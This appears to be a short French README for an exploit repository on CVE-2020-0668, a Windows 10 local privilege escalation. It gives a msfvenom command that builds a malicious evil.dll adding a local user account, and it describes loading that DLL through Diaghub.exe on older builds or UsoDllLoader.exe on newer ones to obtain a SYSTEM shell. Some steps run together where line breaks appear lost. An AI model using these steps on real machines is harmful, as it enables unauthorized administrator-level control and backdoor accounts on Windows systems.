
Faire fonctionner l'exploit CVE-2020-0668 pour la version < win10 v1903 et la version >= win10 v1903
Faire fonctionner l'exploit CVE-2020-0668 pour les versions < win10 v1903 et >= win10 v1903
L'exploit powershell fonctionne sur les versions < win10 v1903 avec Diaghub.
evil.dll avec msfvenom
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 avec powershellDiaghub.exe C:\ProgramData evil.dll pour charger la dll et ajouter l'utilisateur.
L'exploit powershell fonctionne sur les versions >= win10 v1903 avec UsoDllLoader.
exp.ps1 avec powershellUsoDllLoader.exe pour obtenir un shell système
Une version compilée x86 de SysTracingPoc pour issue,l'exploit fonctionne sur les versions >= win10 v1903 grâce à UsoLoadDll.
Un PoC .net. Si vous examinez C:\Windows\System32\evil.dll et que vous le renommez en evil.txt.
Vous constaterez que ce n'est pas un fichier dll. Il ne contient qu'un journal de traçage.
Un PoC powershell. Lui aussi ne contient qu'un journal de traçage dans evil.dll.